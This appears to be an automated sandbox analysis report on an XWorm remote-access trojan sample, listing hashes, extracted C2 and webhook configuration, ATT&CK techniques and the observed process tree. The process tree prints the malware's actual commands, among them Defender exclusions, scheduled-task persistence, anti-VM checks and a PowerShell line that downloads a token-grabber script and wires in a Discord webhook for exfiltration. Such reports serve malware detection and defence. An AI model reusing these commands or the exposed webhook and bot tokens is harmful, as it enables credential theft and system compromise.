xworm | 880e7196dae25d65eb3fd29ed287b9a8b01542544773b5bb833c8260451e3af8

Analysis

max time kernel
606s
max time network
607s
platform
windows10-2004_x64
resource
win10v2004-20240412-en
resource tags

arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system
submitted
18/04/2024, 05:03

Sharing

Copy URL Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

Standlaunchpad.exe
Size

146KB
MD5

acbae31b5ce4eec16a94dbd67c82fcfd
SHA1

7b263bd870b65d42dec5522b94a311241e90870c
SHA256

880e7196dae25d65eb3fd29ed287b9a8b01542544773b5bb833c8260451e3af8
SHA512

d715391e13d9693993b030482f52439c43f0668f7e5d1c92becedb717977bbda48d6967aa3335a2174e5e926438ad0f362b74e1d18679322a777d76ebdc92415
SSDEEP

3072:i5vu8oKRKB4nogL2/7hns9nserUrXJSur:Yu8vN569s9ndrUr55

Score

10^/10

xworm persistence ransomware rat trojan

Malware Config

Extracted

Family

xworm

127.0.0.1:34819

us3.localto.net:34819

Attributes

Install_directory
%Temp%
install_file
Stand.exe
telegram
https://api.telegram.org/bot6916721041:AAGsGXyaplDWQ9HJlE88Z36KtBFClSB3E20

Extracted

Language

ps1

Source

URLs

exe.dropper

https://discord.com/api/webhooks/1230382823261606068/QWN-yrtBhpJr1sW3q2tAEgU8bCovsnK2pWT18JSDg2qmk_Xz1Bk7av7nCf-odeG1uZIF

exe.dropper

https://i.postimg.cc/k58gQ03t/PTG.gif

Extracted

Language

ps1

Source

URLs

ps1.dropper

https://raw.githubusercontent.com/ChildrenOfYahweh/Powershell-Token-Grabber/main/builder.ps1

exe.dropper

https://raw.githubusercontent.com/ChildrenOfYahweh/Powershell-Token-Grabber/main/main.

exe.dropper

https://raw.githubusercontent.com/ChildrenOfYahweh/Powershell-Token-Grabber/main/builder.ps1

exe.dropper

https://github.com/KDot227/Somalifuscator/archive/refs/heads/main.zip

Extracted

Language

ps1

Source

URLs

exe.dropper

https://discord.com/api/webhooks/1230382823261606068/QWN-yrtBhpJr1sW3q2tAEgU8bCovsnK2pWT18JSDg2qmk_Xz1Bk7av7nCf-odeG1uZIF

exe.dropper

https://i.postimg.cc/k58gQ03t/PTG.gif

Signatures

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral2/files/0x000300000001e970-5.dat	family_xworm
behavioral2/memory/1924-14-0x0000000000210000-0x0000000000232000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Blocklisted process makes network request 4 IoCs

flow	pid	Process
73	2984	powershell.exe
92	5108	powershell.exe
93	2420	powershell.exe
95	2420	powershell.exe

Downloads MZ/PE file

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000\Control Panel\International\Geo\Nation	Standlaunchpad.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000\Control Panel\International\Geo\Nation	Standlaunchpad.exe

Drops startup file 2 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stand.lnk	Standlaunchpad.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stand.lnk	Standlaunchpad.exe

Executes dropped EXE 11 IoCs

pid	Process
1924	Standlaunchpad.exe
3952	Stand.exe
3856	Stand.exe
4940	Stand.exe
3972	Stand.exe
5072	Stand.exe
4932	Stand.exe
4888	Stand.exe
4832	Stand.exe
1896	Stand.exe
1244	Stand.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Stand = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Stand.exe"	Standlaunchpad.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
72	raw.githubusercontent.com
73	raw.githubusercontent.com
92	raw.githubusercontent.com
93	raw.githubusercontent.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
33	ip-api.com

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\XBackground.bmp"	Standlaunchpad.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
804	schtasks.exe

Download via BitsAdmin 1 TTPs 1 IoCs

dropper

BITS Jobs

T1197

pid	Process
736	bitsadmin.exe

Modifies data under HKEY_USERS 15 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "134"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271"	LogonUI.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1"	LogonUI.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000_Classes\Local Settings	Standlaunchpad.exe

Runs net.exe

Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery

T1018

pid	Process
4340	PING.EXE
2848	PING.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
1924	Standlaunchpad.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4924	powershell.exe
4924	powershell.exe
4924	powershell.exe
3744	powershell.exe
3744	powershell.exe
3744	powershell.exe
1676	powershell.exe
1676	powershell.exe
1676	powershell.exe
4352	powershell.exe
4352	powershell.exe
4352	powershell.exe
1924	Standlaunchpad.exe
1924	Standlaunchpad.exe
2152	XClient.exe
2152	XClient.exe
2152	XClient.exe
2152	XClient.exe
2152	XClient.exe
2152	XClient.exe
2152	XClient.exe
2152	XClient.exe
2152	XClient.exe
2152	XClient.exe
2152	XClient.exe
2152	XClient.exe
2152	XClient.exe
2152	XClient.exe
2152	XClient.exe
2152	XClient.exe
2152	XClient.exe
2152	XClient.exe
2152	XClient.exe
2152	XClient.exe
2152	XClient.exe
2152	XClient.exe
2152	XClient.exe
2152	XClient.exe
2152	XClient.exe
2152	XClient.exe
2152	XClient.exe
2152	XClient.exe
2152	XClient.exe
2152	XClient.exe
2152	XClient.exe
2152	XClient.exe
2152	XClient.exe
2152	XClient.exe
2152	XClient.exe
2152	XClient.exe
2152	XClient.exe
2152	XClient.exe
2152	XClient.exe
2152	XClient.exe
2152	XClient.exe
2152	XClient.exe
2152	XClient.exe
2152	XClient.exe
2152	XClient.exe
2152	XClient.exe
2152	XClient.exe
2152	XClient.exe
2152	XClient.exe
2152	XClient.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1924	Standlaunchpad.exe
Token: SeDebugPrivilege	4924	powershell.exe
Token: SeDebugPrivilege	3744	powershell.exe
Token: SeDebugPrivilege	1676	powershell.exe
Token: SeDebugPrivilege	4352	powershell.exe
Token: SeDebugPrivilege	1924	Standlaunchpad.exe
Token: SeDebugPrivilege	3952	Stand.exe
Token: SeDebugPrivilege	2152	XClient.exe
Token: SeDebugPrivilege	3856	Stand.exe
Token: SeIncreaseQuotaPrivilege	5060	WMIC.exe
Token: SeSecurityPrivilege	5060	WMIC.exe
Token: SeTakeOwnershipPrivilege	5060	WMIC.exe
Token: SeLoadDriverPrivilege	5060	WMIC.exe
Token: SeSystemProfilePrivilege	5060	WMIC.exe
Token: SeSystemtimePrivilege	5060	WMIC.exe
Token: SeProfSingleProcessPrivilege	5060	WMIC.exe
Token: SeIncBasePriorityPrivilege	5060	WMIC.exe
Token: SeCreatePagefilePrivilege	5060	WMIC.exe
Token: SeBackupPrivilege	5060	WMIC.exe
Token: SeRestorePrivilege	5060	WMIC.exe
Token: SeShutdownPrivilege	5060	WMIC.exe
Token: SeDebugPrivilege	5060	WMIC.exe
Token: SeSystemEnvironmentPrivilege	5060	WMIC.exe
Token: SeRemoteShutdownPrivilege	5060	WMIC.exe
Token: SeUndockPrivilege	5060	WMIC.exe
Token: SeManageVolumePrivilege	5060	WMIC.exe
Token: 33	5060	WMIC.exe
Token: 34	5060	WMIC.exe
Token: 35	5060	WMIC.exe
Token: 36	5060	WMIC.exe
Token: SeIncreaseQuotaPrivilege	5060	WMIC.exe
Token: SeSecurityPrivilege	5060	WMIC.exe
Token: SeTakeOwnershipPrivilege	5060	WMIC.exe
Token: SeLoadDriverPrivilege	5060	WMIC.exe
Token: SeSystemProfilePrivilege	5060	WMIC.exe
Token: SeSystemtimePrivilege	5060	WMIC.exe
Token: SeProfSingleProcessPrivilege	5060	WMIC.exe
Token: SeIncBasePriorityPrivilege	5060	WMIC.exe
Token: SeCreatePagefilePrivilege	5060	WMIC.exe
Token: SeBackupPrivilege	5060	WMIC.exe
Token: SeRestorePrivilege	5060	WMIC.exe
Token: SeShutdownPrivilege	5060	WMIC.exe
Token: SeDebugPrivilege	5060	WMIC.exe
Token: SeSystemEnvironmentPrivilege	5060	WMIC.exe
Token: SeRemoteShutdownPrivilege	5060	WMIC.exe
Token: SeUndockPrivilege	5060	WMIC.exe
Token: SeManageVolumePrivilege	5060	WMIC.exe
Token: 33	5060	WMIC.exe
Token: 34	5060	WMIC.exe
Token: 35	5060	WMIC.exe
Token: 36	5060	WMIC.exe
Token: SeDebugPrivilege	4912	powershell.exe
Token: SeDebugPrivilege	2984	powershell.exe
Token: SeDebugPrivilege	3380	powershell.exe
Token: SeDebugPrivilege	1108	powershell.exe
Token: SeIncreaseQuotaPrivilege	4364	WMIC.exe
Token: SeSecurityPrivilege	4364	WMIC.exe
Token: SeTakeOwnershipPrivilege	4364	WMIC.exe
Token: SeLoadDriverPrivilege	4364	WMIC.exe
Token: SeSystemProfilePrivilege	4364	WMIC.exe
Token: SeSystemtimePrivilege	4364	WMIC.exe
Token: SeProfSingleProcessPrivilege	4364	WMIC.exe
Token: SeIncBasePriorityPrivilege	4364	WMIC.exe
Token: SeCreatePagefilePrivilege	4364	WMIC.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
1924	Standlaunchpad.exe
3844	LogonUI.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2840 wrote to memory of 1924	2840	Standlaunchpad.exe	87
PID 2840 wrote to memory of 1924	2840	Standlaunchpad.exe	87
PID 2840 wrote to memory of 3484	2840	Standlaunchpad.exe	88
PID 2840 wrote to memory of 3484	2840	Standlaunchpad.exe	88
PID 2840 wrote to memory of 3484	2840	Standlaunchpad.exe	88
PID 3484 wrote to memory of 736	3484	mshta.exe	93
PID 3484 wrote to memory of 736	3484	mshta.exe	93
PID 3484 wrote to memory of 736	3484	mshta.exe	93
PID 1924 wrote to memory of 4924	1924	Standlaunchpad.exe	102
PID 1924 wrote to memory of 4924	1924	Standlaunchpad.exe	102
PID 1924 wrote to memory of 3744	1924	Standlaunchpad.exe	104
PID 1924 wrote to memory of 3744	1924	Standlaunchpad.exe	104
PID 1924 wrote to memory of 1676	1924	Standlaunchpad.exe	106
PID 1924 wrote to memory of 1676	1924	Standlaunchpad.exe	106
PID 1924 wrote to memory of 4352	1924	Standlaunchpad.exe	108
PID 1924 wrote to memory of 4352	1924	Standlaunchpad.exe	108
PID 1924 wrote to memory of 804	1924	Standlaunchpad.exe	110
PID 1924 wrote to memory of 804	1924	Standlaunchpad.exe	110
PID 3484 wrote to memory of 2152	3484	mshta.exe	113
PID 3484 wrote to memory of 2152	3484	mshta.exe	113
PID 1924 wrote to memory of 4852	1924	Standlaunchpad.exe	117
PID 1924 wrote to memory of 4852	1924	Standlaunchpad.exe	117
PID 4852 wrote to memory of 2788	4852	cmd.exe	119
PID 4852 wrote to memory of 2788	4852	cmd.exe	119
PID 4852 wrote to memory of 4340	4852	cmd.exe	120
PID 4852 wrote to memory of 4340	4852	cmd.exe	120
PID 4852 wrote to memory of 4300	4852	cmd.exe	121
PID 4852 wrote to memory of 4300	4852	cmd.exe	121
PID 4852 wrote to memory of 3680	4852	cmd.exe	122
PID 4852 wrote to memory of 3680	4852	cmd.exe	122
PID 3680 wrote to memory of 5060	3680	cmd.exe	123
PID 3680 wrote to memory of 5060	3680	cmd.exe	123
PID 4852 wrote to memory of 816	4852	cmd.exe	124
PID 4852 wrote to memory of 816	4852	cmd.exe	124
PID 4852 wrote to memory of 1528	4852	cmd.exe	125
PID 4852 wrote to memory of 1528	4852	cmd.exe	125
PID 4852 wrote to memory of 2712	4852	cmd.exe	126
PID 4852 wrote to memory of 2712	4852	cmd.exe	126
PID 4852 wrote to memory of 428	4852	cmd.exe	127
PID 4852 wrote to memory of 428	4852	cmd.exe	127
PID 4852 wrote to memory of 4364	4852	cmd.exe	128
PID 4852 wrote to memory of 4364	4852	cmd.exe	128
PID 4852 wrote to memory of 436	4852	cmd.exe	129
PID 4852 wrote to memory of 436	4852	cmd.exe	129
PID 4852 wrote to memory of 4912	4852	cmd.exe	130
PID 4852 wrote to memory of 4912	4852	cmd.exe	130
PID 4852 wrote to memory of 2908	4852	cmd.exe	131
PID 4852 wrote to memory of 2908	4852	cmd.exe	131
PID 4852 wrote to memory of 4028	4852	cmd.exe	132
PID 4852 wrote to memory of 4028	4852	cmd.exe	132
PID 4852 wrote to memory of 2380	4852	cmd.exe	133
PID 4852 wrote to memory of 2380	4852	cmd.exe	133
PID 2380 wrote to memory of 4772	2380	net.exe	134
PID 2380 wrote to memory of 4772	2380	net.exe	134
PID 4852 wrote to memory of 4788	4852	cmd.exe	135
PID 4852 wrote to memory of 4788	4852	cmd.exe	135
PID 4852 wrote to memory of 2848	4852	cmd.exe	136
PID 4852 wrote to memory of 2848	4852	cmd.exe	136
PID 4852 wrote to memory of 3844	4852	cmd.exe	137
PID 4852 wrote to memory of 3844	4852	cmd.exe	137
PID 4852 wrote to memory of 2984	4852	cmd.exe	138
PID 4852 wrote to memory of 2984	4852	cmd.exe	138
PID 4852 wrote to memory of 4916	4852	cmd.exe	140
PID 4852 wrote to memory of 4916	4852	cmd.exe	140

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
5068	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Standlaunchpad.exe
"C:\Users\Admin\AppData\Local\Temp\Standlaunchpad.exe"
1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2840
- C:\Users\Admin\AppData\Roaming\Standlaunchpad.exe
  "C:\Users\Admin\AppData\Roaming\Standlaunchpad.exe"
  2⤵
  - Checks computer location settings
  - Drops startup file
  - Executes dropped EXE
  - Adds Run key to start application
  - Sets desktop wallpaper using registry
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:1924
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Standlaunchpad.exe'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4924
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Standlaunchpad.exe'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3744
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Stand.exe'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1676
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Stand.exe'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4352
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Stand" /tr "C:\Users\Admin\AppData\Local\Temp\Stand.exe"
    3⤵
    - Creates scheduled task(s)
    PID:804
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\wazdhg.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4852
  - - C:\Windows\system32\findstr.exe
      findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\wazdhg.bat"
      4⤵
      PID:2788
  - - C:\Windows\system32\PING.EXE
      ping -n 1 -w 700 www.google.com
      4⤵
      Runs ping.exe
      PID:4340
  - - C:\Windows\system32\find.exe
      find "Pinging"
      4⤵
      PID:4300
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c wmic computersystem get manufacturer /value
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3680
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic computersystem get manufacturer /value
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5060
  - - C:\Windows\system32\findstr.exe
      findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\wazdhg.bat"
      4⤵
      PID:816
  - - C:\Windows\system32\findstr.exe
      findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\wazdhg.bat"
      4⤵
      PID:1528
  - - C:\Windows\system32\findstr.exe
      findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\wazdhg.bat"
      4⤵
      PID:2712
  - - C:\Windows\system32\findstr.exe
      findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\wazdhg.bat"
      4⤵
      PID:428
  - - C:\Windows\system32\findstr.exe
      findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\wazdhg.bat"
      4⤵
      PID:4364
  - - C:\Windows\system32\chcp.com
      chcp 65001
      4⤵
      PID:436
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if ((Get-WmiObject Win32_ComputerSystem).Model -match 'Virtual') { taskkill /F /IM cmd.exe }"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4912
  - - C:\Windows\system32\findstr.exe
      findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\wazdhg.bat"
      4⤵
      PID:2908
  - - C:\Windows\system32\rundll32.exe
      rundll32
      4⤵
      PID:4028
  - - C:\Windows\system32\net.exe
      net session
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2380
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        5⤵
        
        PID:4772
  - - C:\Windows\system32\doskey.exe
      doskey REM=SCHTASKS
      4⤵
      PID:4788
  - - C:\Windows\system32\PING.EXE
      ping -n 1 -w 700 www.google.com
      4⤵
      Runs ping.exe
      PID:2848
  - - C:\Windows\system32\find.exe
      find "Pinging"
      4⤵
      PID:3844
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -c "$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Powershell-Token-Grabber/main/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1230382823261606068/QWN-yrtBhpJr1sW3q2tAEgU8bCovsnK2pWT18JSDg2qmk_Xz1Bk7av7nCf-odeG1uZIF' | Out-File -FilePath 'powershell123.ps1' -Encoding ASCII"
      4⤵
      Blocklisted process makes network request
      Suspicious use of AdjustPrivilegeToken
      PID:2984
  - - C:\Windows\system32\wscript.exe
      wscript /b
      4⤵
      PID:4916
  - - C:\Windows\system32\attrib.exe
      attrib +h +s powershell123.ps1
      4⤵
      Views/modifies file attributes
      PID:5068
  - - C:\Windows\system32\doskey.exe
      doskey CLS=COMPACT
      4⤵
      PID:2476
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Unrestricted -Force
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3380
  - - C:\Windows\system32\wscript.exe
      wscript /b
      4⤵
      PID:1044
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -noprofile -executionpolicy bypass -WindowStyle hidden -file powershell123.ps1
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1108
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\eab4efzt\eab4efzt.cmdline"
        5⤵
        
        PID:2004
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES67BE.tmp" "c:\Users\Admin\AppData\Local\Temp\eab4efzt\CSC541FBE4E58A146008EB27512FF32444.TMP"
        6⤵
        
        PID:4724
  - - C:\Windows\system32\findstr.exe
      findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\wazdhg.bat"
      4⤵
      PID:2876
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c wmic computersystem get manufacturer /value
      4⤵
      PID:396
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic computersystem get manufacturer /value
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4364
  - - C:\Windows\system32\findstr.exe
      findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\wazdhg.bat"
      4⤵
      PID:4932
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if((gcim Win32_PhysicalMemory | measure -Property capacity -Sum).sum /1gb -lt 8) {spps -f -n "cmd" -ErrorAction SilentlyContinue;exit 1}"
      4⤵
      PID:4612
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\aporkb.ps1"
    3⤵
    - Blocklisted process makes network request
    PID:5108
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\z0j4lgxw\z0j4lgxw.cmdline"
      4⤵
      PID:1064
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAA51.tmp" "c:\Users\Admin\AppData\Local\Temp\z0j4lgxw\CSC671B6702AC4F4B789C829FDA71A46A53.TMP"
        5⤵
        
        PID:1704
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Local\Temp\builder.ps1
      4⤵
      Blocklisted process makes network request
      PID:2420
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4qfro0cu\4qfro0cu.cmdline"
        5⤵
        
        PID:4416
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC01B.tmp" "c:\Users\Admin\AppData\Local\Temp\4qfro0cu\CSC1A5E3D06707644C3A197859812B185E6.TMP"
        6⤵
        
        PID:4628
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\oqczty.ps1"
    3⤵
    PID:4332
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\010vh0t0\010vh0t0.cmdline"
      4⤵
      PID:4088
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES552.tmp" "c:\Users\Admin\AppData\Local\Temp\010vh0t0\CSC4B9A2471CD5A4729885EF08494B432E.TMP"
        5⤵
        
        PID:2548
- - C:\Windows\SYSTEM32\shutdown.exe
    shutdown.exe /f /s /t 0
    3⤵
    PID:1680
- C:\Windows\SysWOW64\mshta.exe
  "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
  2⤵
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:3484
- - C:\Windows\SysWOW64\bitsadmin.exe
    "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\XClient.exe
    3⤵
    - Download via BitsAdmin
    PID:736
- - C:\Users\Admin\AppData\Local\Temp\XClient.exe
    "C:\Users\Admin\AppData\Local\Temp\XClient.exe"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2152

C:\Users\Admin\AppData\Local\Temp\Stand.exe
C:\Users\Admin\AppData\Local\Temp\Stand.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3952

C:\Users\Admin\AppData\Local\Temp\Stand.exe
C:\Users\Admin\AppData\Local\Temp\Stand.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3856

C:\Users\Admin\AppData\Local\Temp\Stand.exe
C:\Users\Admin\AppData\Local\Temp\Stand.exe
1⤵
- Executes dropped EXE
PID:4940

C:\Users\Admin\AppData\Local\Temp\Stand.exe
C:\Users\Admin\AppData\Local\Temp\Stand.exe
1⤵
- Executes dropped EXE
PID:3972

C:\Users\Admin\AppData\Local\Temp\Stand.exe
